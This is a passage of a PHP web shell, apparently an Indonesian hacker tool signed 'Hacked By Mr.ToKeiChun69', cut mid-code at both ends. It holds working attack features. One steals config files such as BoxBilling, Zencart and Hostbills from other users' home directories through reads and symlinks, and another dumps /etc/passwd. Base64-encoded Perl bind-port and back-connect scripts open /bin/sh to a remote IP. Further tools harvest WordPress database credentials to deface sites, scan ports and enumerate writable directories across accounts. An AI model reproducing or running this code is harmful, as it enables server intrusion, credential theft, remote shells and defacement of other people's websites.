  1145. "/home/$user_con7ext/public_html/hosting/bb-config.php" => "BoxBilling",
  1146. "/home/$user_con7ext/public_html/cart/bb-config.php" => "BoxBilling",
  1147. "/home/$user_con7ext/public_html/order/bb-config.php" => "BoxBilling",
  1148. "/home/$user_con7ext/public_html/client/bb-config.php" => "BoxBilling",
  1149. "/home/$user_con7ext/public_html/clients/bb-config.php" => "BoxBilling",
  1150. "/home/$user_con7ext/public_html/cliente/bb-config.php" => "BoxBilling",
  1151. "/home/$user_con7ext/public_html/clientes/bb-config.php" => "BoxBilling",
  1152. "/home/$user_con7ext/public_html/billing/bb-config.php" => "BoxBilling",
  1153. "/home/$user_con7ext/public_html/billings/bb-config.php" => "BoxBilling",
  1154. "/home/$user_con7ext/public_html/my/bb-config.php" => "BoxBilling",
  1155. "/home/$user_con7ext/public_html/secure/bb-config.php" => "BoxBilling",
  1156. "/home/$user_con7ext/public_html/support/order/bb-config.php" => "BoxBilling",
  1157. "/home/$user_con7ext/public_html/includes/dist-configure.php" => "Zencart",
  1158. "/home/$user_con7ext/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1159. "/home/$user_con7ext/public_html/products/includes/dist-configure.php" => "Zencart",
  1160. "/home/$user_con7ext/public_html/cart/includes/dist-configure.php" => "Zencart",
  1161. "/home/$user_con7ext/public_html/shop/includes/dist-configure.php" => "Zencart",
  1162. "/home/$user_con7ext/public_html/includes/iso4217.php" => "Hostbills",
  1163. "/home/$user_con7ext/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1164. "/home/$user_con7ext/public_html/host/includes/iso4217.php" => "Hostbills",
  1165. "/home/$user_con7ext/public_html/Host/includes/iso4217.php" => "Hostbills",
  1166. "/home/$user_con7ext/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1167. "/home/$user_con7ext/public_html/support/includes/iso4217.php" => "Hostbills",
  1168. "/home/$user_con7ext/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1169. "/home/$user_con7ext/public_html/cart/includes/iso4217.php" => "Hostbills",
  1170. "/home/$user_con7ext/public_html/order/includes/iso4217.php" => "Hostbills",
  1171. "/home/$user_con7ext/public_html/client/includes/iso4217.php" => "Hostbills",
  1172. "/home/$user_con7ext/public_html/clients/includes/iso4217.php" => "Hostbills",
  1173. "/home/$user_con7ext/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1174. "/home/$user_con7ext/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1175. "/home/$user_con7ext/public_html/billing/includes/iso4217.php" => "Hostbills",
  1176. "/home/$user_con7ext/public_html/billings/includes/iso4217.php" => "Hostbills",
  1177. "/home/$user_con7ext/public_html/my/includes/iso4217.php" => "Hostbills",
  1178. "/home/$user_con7ext/public_html/secure/includes/iso4217.php" => "Hostbills",
  1179. "/home/$user_con7ext/public_html/support/order/includes/iso4217.php" => "Hostbills"
  1180. );  
  1181.  
  1182. foreach($grab_config as $config => $nama_config) {
  1183.     if($_POST['config'] == 'grab') {
  1184. $ambil_config = file_get_contents($config);
  1185. if($ambil_config == '') {
  1186. } else {
  1187. $file_config = fopen("con7ext_configgrab/$user_con7ext-$nama_config.txt","w");
  1188. fputs($file_config,$ambil_config);
  1189. }
  1190. }
  1191. if($_POST['config'] == 'symlink') {
  1192. @symlink($config,"con7ext_Symconfig/".$user_con7ext."-".$nama_config.".txt");
  1193. }
  1194. if($_POST['config'] == '404') {
  1195. $sym404=symlink($config,"con7ext_sym404/".$user_con7ext."-".$nama_config.".txt");
  1196. if($sym404){
  1197.     @mkdir("con7ext_sym404/".$user_con7ext."-".$nama_config.".txt404", 0777);
  1198.     $htaccess="Options Indexes FollowSymLinks
  1199. DirectoryIndex con7ext.htm
  1200. HeaderName con7ext.txt
  1201. Satisfy Any
  1202. IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
  1203. IndexIgnore *";
  1204.  
  1205. @file_put_contents("con7ext_sym404/".$user_con7ext."-".$nama_config.".txt404/.htaccess",$htaccess);
  1206.  
  1207. @symlink($config,"con7ext_sym404/".$user_con7ext."-".$nama_config.".txt404/con7ext.txt");
  1208.  
  1209.     }
  1210.  
  1211. }
  1212.  
  1213.                     }    
  1214.         }  if($_POST['config'] == 'grab') {
  1215.             echo "<center><a href='?path=$path/con7ext_configgrab'><font color=lime>Done</font></a></center>";
  1216.         }
  1217.     if($_POST['config'] == '404') {
  1218.         echo "<center>
  1219. <a href=\"con7ext_sym404/root/\">SymlinkNya</a>
  1220. <br><a href=\"con7ext_sym404/\">Configurations</a></center>";
  1221.     }
  1222.      if($_POST['config'] == 'symlink') {
  1223. echo "<center>
  1224. <a href=\"con7ext_symconfig/root/\">Symlinknya</a>
  1225. <br><a href=\"con7ext_symconfig/\">Configurations</a></center>";
  1226.             }if($_POST['config'] == 'symvhost') {
  1227. echo "<center>
  1228. <a href=\"con7ext_symvhost/root/\">Root Server</a>
  1229. <br><a href=\"con7ext_symvhost/\">Configurations</a></center>";
  1230.             }
  1231.        
  1232.        
  1233.         }else{
  1234.         echo "<form method=\"post\" action=\"\"><center>
  1235.         </center></select><br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1236.         echo include("/etc/passwd");
  1237.         echo "</textarea><br><br>
  1238.         <select class=\"select\" name=\"config\"  style=\"width: 450px;\" height=\"10\">
  1239.         <option value=\"grab\">Config Grab</option>
  1240.         <option value=\"symlink\">Symlink Config</option>
  1241.         <option value=\"404\">Config 404</option>
  1242.         <option value=\"symvhosts\">Vhosts Config Grabber</option><br><br><input type=\"submit\" value=\"Start!!\"></td></tr></center>\n";
  1243. }
  1244. }
  1245. elseif($_GET['jancok'] == 'zip') {
  1246.     echo "<center><h1>Zip Menu</h1>";
  1247. function rmdir_recursive($dir) {
  1248.     foreach(scandir($dir) as $file) {
  1249.        if ('.' === $file || '..' === $file) continue;
  1250.        if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  1251.        else unlink("$dir/$file");
  1252.    }
  1253.    rmdir($dir);
  1254. }
  1255. if($_FILES["zip_file"]["name"]) {
  1256.     $filename = $_FILES["zip_file"]["name"];
  1257.     $source = $_FILES["zip_file"]["tmp_name"];
  1258.     $type = $_FILES["zip_file"]["type"];
  1259.     $name = explode(".", $filename);
  1260.     $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  1261.     foreach($accepted_types as $mime_type) {
  1262.         if($mime_type == $type) {
  1263.             $okay = true;
  1264.             break;
  1265.         }
  1266.     }
  1267.     $continue = strtolower($name[1]) == 'zip' ? true : false;
  1268.     if(!$continue) {
  1269.         $message = "Itu Bukan Zip  , , GOBLOK COK";
  1270.     }
  1271.   $path = dirname(__FILE__).'/';
  1272.   $filenoext = basename ($filename, '.zip');
  1273.   $filenoext = basename ($filenoext, '.ZIP');
  1274.   $targetdir = $path . $filenoext;
  1275.   $targetzip = $path . $filename;
  1276.   if (is_dir($targetdir))  rmdir_recursive ( $targetdir);
  1277.   mkdir($targetdir, 0777);
  1278.     if(move_uploaded_file($source, $targetzip)) {
  1279.         $zip = new ZipArchive();
  1280.         $x = $zip->open($targetzip);
  1281.         if ($x === true) {
  1282.             $zip->extractTo($targetdir);
  1283.             $zip->close();
  1284.  
  1285.             unlink($targetzip);
  1286.         }
  1287.         $message = "<b>Sukses Gan :)</b>";
  1288.     } else {   
  1289.         $message = "<b>Error Gan :(</b>";
  1290.     }
  1291. }  
  1292. echo '<table style="width:100%" border="1">
  1293.   <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  1294. <label>Zip File : <input type="file" name="zip_file" /></label>
  1295. <input type="submit" name="submit" value="Upload And Unzip" />
  1296. </form>';
  1297. if($message) echo "<p>$message</p>";
  1298. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/tkc_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";  
  1299.     if($_POST['backup']){
  1300.     $save=$_POST['save'];
  1301.     function Zip($source, $destination)
  1302. {
  1303.     if (extension_loaded('zip') === true)
  1304.     {
  1305.         if (file_exists($source) === true)
  1306.         {
  1307.             $zip = new ZipArchive();
  1308.  
  1309.             if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1310.             {
  1311.                 $source = realpath($source);
  1312.  
  1313.                 if (is_dir($source) === true)
  1314.                 {
  1315.                     $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1316.  
  1317.                     foreach ($files as $file)
  1318.                     {
  1319.                         $file = realpath($file);
  1320.  
  1321.                         if (is_dir($file) === true)
  1322.                         {
  1323.                             $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1324.                         }
  1325.  
  1326.                         else if (is_file($file) === true)
  1327.                         {
  1328.                             $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1329.                         }
  1330.                     }
  1331.                 }
  1332.  
  1333.                 else if (is_file($source) === true)
  1334.                 {
  1335.                     $zip->addFromString(basename($source), file_get_contents($source));
  1336.                 }
  1337.             }
  1338.  
  1339.             return $zip->close();
  1340.         }
  1341.     }
  1342.  
  1343.     return false;
  1344. }
  1345.     Zip($_POST['dir'],$save);
  1346.     echo "Done , Save To <b>$save</b>";
  1347.     }
  1348.     echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/tkc_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
  1349.     if($_POST['extrak']){
  1350.     $save=$_POST['save'];
  1351.     $zip = new ZipArchive;
  1352.     $res = $zip->open($_POST['dir']);
  1353.     if ($res === TRUE) {
  1354.         $zip->extractTo($save);
  1355.         $zip->close();
  1356.     echo 'Succes , Location : <b>'.$save.'</b>';
  1357.     } else {
  1358.     echo 'Gagal Mas :( Ntahlah !';
  1359.     }
  1360.     }
  1361. echo '</tr></table>';
  1362. }
  1363. elseif($_GET['jancok'] == 'bconnect') {
  1364.     echo "<form method='post'>
  1365.     <u>Bind Port:</u> <br>
  1366.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  1367.     <input type='submit' name='sub_bp' value='>>'>
  1368.     </form>
  1369.     <form method='post'>
  1370.     <u>Back Connect:</u> <br>
  1371.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  1372.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  1373.     <input type='submit' name='sub_bc' value='>>'>
  1374.     </form>";
  1375.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  1376.     if(isset($_POST['sub_bp'])) {
  1377.         $f_bp = fopen("/tmp/bp.pl", "w");
  1378.         fwrite($f_bp, base64_decode($bind_port_p));
  1379.         fclose($f_bp);
  1380.  
  1381.         $port = $_POST['port_bind'];
  1382.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  1383.         sleep(1);
  1384.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  1385.         unlink("/tmp/bp.pl");
  1386.     }
  1387.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  1388.     if(isset($_POST['sub_bc'])) {
  1389.         $f_bc = fopen("/tmp/bc.pl", "w");
  1390.         fwrite($f_bc, base64_decode($bind_connect_p));
  1391.         fclose($f_bc);
  1392.  
  1393.         $ipbc = $_POST['ip_bc'];
  1394.         $port = $_POST['port_bc'];
  1395.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  1396.         sleep(1);
  1397.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  1398.         unlink("/tmp/bc.pl");
  1399.     }
  1400. }
  1401. elseif($_GET['jancok'] == 'portsc') {
  1402.     echo"<form action='' method='post'>"              ;
  1403.     $start = strip_tags($_POST['start']);
  1404.     $end = strip_tags($_POST['end']);
  1405.     $host = strip_tags($_POST['host']);
  1406.     if (isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])) {
  1407.         for ($i = $start;$i <= $end;$i++) {
  1408.             $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  1409.             if ($fp) {
  1410.                 echo 'Port ' . $i . ' is <font color=green>open</font><br>';
  1411.             }
  1412.             flush();
  1413.         }
  1414.     } else {
  1415.         echo '<center><table class=tabnet style="width:300px;padding:0 1px;">
  1416.    <input type="hidden" name="y" value="phptools">
  1417.    <tr><th colspan="5">Port Scanner</th></center></tr>
  1418.    <tr>
  1419.         <td>Host</td>
  1420.         <td><input type="text" class="inputz"  style="width:220px;color:#00ff00;" name="host" value="localhost"/></td>
  1421.    </tr>
  1422.    <tr>
  1423.         <td>Port start</td>
  1424.         <td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="start" value="0"/></td>
  1425.    </tr>
  1426.     <tr><td>Port end</td>
  1427.         <td><input type="text" class="inputz"  style="width:220px;color:#00ff00;" name="end" value="5000"/></td>
  1428.    </tr><td><center><input class="inputzbut" type="submit" style="color:#00ff00" value="Scan Ports" />
  1429.    </td></form></center></table>';
  1430.     }
  1431. } elseif($_GET['jancok'] == 'auto_wp_title') {
  1432.     if($_POST['hajar']) {
  1433.         $title = htmlspecialchars($_POST['new_title']);
  1434.         $pn_title = str_replace(" ", "-", $title);
  1435.         if($_POST['cek_edit'] == "Y") {
  1436.             $script = $_POST['edit_content'];
  1437.         } else {
  1438.             $script = $title;
  1439.         }
  1440.         $conf = $_POST['config_dir'];
  1441.         $scan_conf = scandir($conf);
  1442.         foreach($scan_conf as $file_conf) {
  1443.             if(!is_file("$conf/$file_conf")) continue;
  1444.             $config = file_get_contents("$conf/$file_conf");
  1445.             if(preg_match("/WordPress/", $config)) {
  1446.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  1447.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  1448.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1449.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  1450.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1451.                 $prefix = $dbprefix."posts";
  1452.                 $option = $dbprefix."options";
  1453.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1454.                 $db = mysql_select_db($dbname);
  1455.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1456.                 $result = mysql_fetch_array($q);
  1457.                 $id = $result[ID];
  1458.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1459.                 $result2 = mysql_fetch_array($q2);
  1460.                 $target = $result2[option_value];
  1461.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1462.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1463.                 echo "<div style='margin: 5px auto;'>";
  1464.                 if($target == '') {
  1465.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1466.                 } else {
  1467.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1468.                 }
  1469.                 if(!$update OR !$conn OR !$db) {
  1470.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1471.                 } else {
  1472.                     echo "<font color=lime>sukses di ganti.</font><br>";
  1473.                 }
  1474.                 echo "</div>";
  1475.                 mysql_close($conn);
  1476.             }
  1477.         }
  1478.     } else {
  1479.         echo "<center>
  1480.         <h1>Auto Edit Title+Content WordPress</h1>
  1481.         <form method='post'>
  1482.         DIR Config: <br>
  1483.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1484.         Set Title: <br>
  1485.         <input type='text' name='new_title' value='Hacked By Mr.ToKeiChun69' placeholder='New Title'><br><br>
  1486.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1487.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1488.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1489.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1490.         </form>
  1491.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1492.         ";
  1493.     }
  1494.     } elseif($_GET['jancok'] == 'loghunter')
  1495.     {
  1496. echo '<center><h2>Log Hunter</h2></center>';    
  1497.         echo "<Center>\n";
  1498. echo "<form action=\"\" method=\"post\">\n";
  1499. ?><br>Dir :<input type="text" value="<?=getcwd();?>" name="shc_dir"><?php
  1500. echo "<input type=\"submit\" name=\"submit\" class=\"kotak\" value=\"Scan Now!\"/>\n";
  1501. echo "</form>\n";
  1502. echo "<pre style=\"text-align: left;\">\n";
  1503. error_reporting(0);
  1504. /*
  1505. Name    : Log Hunter (Grab Email)
  1506. Date    : 26/03/2016 05:53 PM
  1507. Link    : http://facebook.com/bug7sec
  1508. Link    : http://pastebin.com/u/shor7cut
  1509. Author  : Shor7cut
  1510. */
  1511.  
  1512.  
  1513. if($_POST['submit']){
  1514. function tampilkan($shcdirs){
  1515. foreach(scandir($shcdirs) as $shc)
  1516.     {
  1517.         if($shc!='.' && $shc!='..')
  1518.         {
  1519.             $shc = $shcdirs.DIRECTORY_SEPARATOR.$shc;
  1520.             if( !is_dir($shc) && !eregi("css", $shc) ){
  1521.  
  1522.                 $fgt    = file_get_contents($shc);
  1523.                 $ifgt   = exif_read_data($shc);
  1524.                 $jembut = "COMPUTED";
  1525.                 $taik   = "UserComment";
  1526.                 $shcm = "/mail['(']/";
  1527.                 if($ifgt[$jembut][$taik]){
  1528.                     echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font><br>";
  1529.                 }
  1530.                 preg_match_all('#[A-Z0-9a-z._%+-]+@[A-Za-z0-9.+-]+#',$fgt,$cocok);
  1531.                 $hcs  = "/base64_decode/";
  1532.                 $exif = "/exif_read_data/";
  1533.                 preg_match($shcm, addslashes($fgt), $mailshc);
  1534.                 preg_match($hcs,  addslashes($fgt), $shcmar);
  1535.                 preg_match($exif, addslashes($fgt), $shcxif);
  1536.                 if(eregi('HTTP Cookie File', $fgt) || eregi('PHP Warning:', $fgt) ){
  1537.                 }
  1538.                 if(eregi('tmp_name', $fgt)){
  1539.                     echo "[<font color=#FAFF14>Uploader</font>] <font color=#2196F3>".$shc."</font><br>";
  1540.                 }
  1541.                 if($shcmar[0]){
  1542.                     echo "[<font color=#FF3D00>Base64</font>] <font color=#2196F3>".$shc."</font><br>";
  1543.                 }
  1544.                 if($mailshc[0]){
  1545.                     echo "[<font color=#E6004E>MailFunc</font>] <font color=#2196F3>".$shc."</font><br>";
  1546.                 }
  1547.                 if($shcxif[0]){
  1548.                     echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font> </font><font color=red>{Manual Check}</font><br>";
  1549.                 }
  1550.                 if(eregi("js", $shc)){
  1551.                             echo "[<font color=red>Javascript</font>] <font color=#2196F3>".$shc."</font> { <a href=http://www.unphp.net target=_blank>CheckJS</a> }<br>";
  1552.                 }
  1553.                 if($cocok[0]){
  1554.                     foreach ($cocok[0] as $key => $shcmail) {
  1555.                         if (filter_var($shcmail, FILTER_VALIDATE_EMAIL)) {
  1556.                             echo "[<font color=greenyellow>SendMail</font>] <font color=#2196F3>".$shc."</font> { ".$shcmail." }<br>";
  1557.                         }
  1558.                     }
  1559.                 }
  1560.            
  1561.             }else{
  1562.                 tampilkan($shc);
  1563.             }
  1564.         }
  1565.     }
  1566. }
  1567. tampilkan($_POST['shc_dir']);
  1568. }
  1569. echo "</pre>\n";
  1570. echo "</Center>\n";
  1571. } elseif($_GET['jancok'] == 'jumping') {
  1572.     $i = 0;
  1573.     echo "<pre><div class='margin: 5px auto;'>";
  1574.     $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  1575.     while($passwd = fgets($etc)) {
  1576.         if($passwd == '' || !$etc) {
  1577.             echo "<font color=red>Can't read /etc/passwd</font>";
  1578.         } else {
  1579.             preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1580.             foreach($user_jumping[1] as $user_con7ext_jump) {
  1581.                 $user_jumping_dir = "/home/$user_con7ext_jump/public_html";
  1582.                 if(is_readable($user_jumping_dir)) {
  1583.                     $i++;
  1584.                     $jrw = "[<font color=white>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1585.                     if(is_writable($user_jumping_dir)) {
  1586.                         $jrw = "[<font color=white>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  1587.                     }
  1588.                     echo $jrw;
  1589.                     if(function_exists('posix_getpwuid')) {
  1590.                         $domain_jump = file_get_contents("/etc/named.conf");   
  1591.                         if($domain_jump == '') {
  1592.                             echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1593.                         } else {
  1594.                             preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1595.                             foreach($domains_jump[1] as $dj) {
  1596.                                 $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1597.                                 $user_jumping_url = $user_jumping_url['name'];
  1598.                                 if($user_jumping_url == $user_con7ext_jump) {
  1599.                                     echo " => ( <u>$dj</u> )<br>";
  1600.                                     break;
  1601.                                 }
  1602.                             }
  1603.                         }
  1604.                     } else {
  1605.                         echo "<br>";
  1606.                     }
  1607.                 }
  1608.             }
  1609.         }
  1610.     }
  1611.     if($i == 0) {
  1612.     } else {
  1613.         echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  1614.     }
  1615.     echo "</div></pre>";
  1616. } elseif($_GET['backconnect'] == 'tool'){
  1617. echo "<br><br><center><form method=post>
  1618. <br>    <span>Bind port to /bin/sh [Perl]</span><br/>
  1619.     Port: <input type='text' name='port' value='443'> <input type=submit name=bpl value='>>'>
  1620. <br><br>
  1621.         <span>Back-connect</span><br/>
  1622.     Server: <input type='text' name='server' placeholder='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' placeholder='443'><select class='select' name='backconnect'  style='width: 100px;' height='10'><option value='perl'>Perl</option><option value='php'>PHP</option><option value='python'>Python</option><option value='ruby'>Ruby</option></select>
  1623.    <input type=submit value='>>'>";
  1624.     if($_POST['bpl']) {
  1625.     $bp=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");
  1626.     $brt=@fopen('bp.pl','w');
  1627. fwrite($brt,$bp);
  1628. $out = exe("perl bp.pl ".$_POST['port']." 1>/dev/null 2>&1 &");
  1629. sleep(1);
  1630. echo "<pre>$out\n".exe("ps aux | grep bp.pl")."</pre>";
  1631. unlink("bp.pl");
  1632.         }
  1633.         if($_POST['backconnect'] == 'perl') {
  1634. $bc=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");
  1635. $plbc=@fopen('bc.pl','w');
  1636. fwrite($plbc,$bc);
  1637. $out = exe("perl bc.pl ".$_POST['server']." ".$_POST['port']." 1>/dev/null 2>&1 &");
  1638. sleep(1);
  1639. echo "<pre>$out\n".exe("ps aux | grep bc.pl")."</pre>";
  1640. unlink("bc.pl");
  1641. }
  1642. if($_POST['backconnect'] == 'python') {
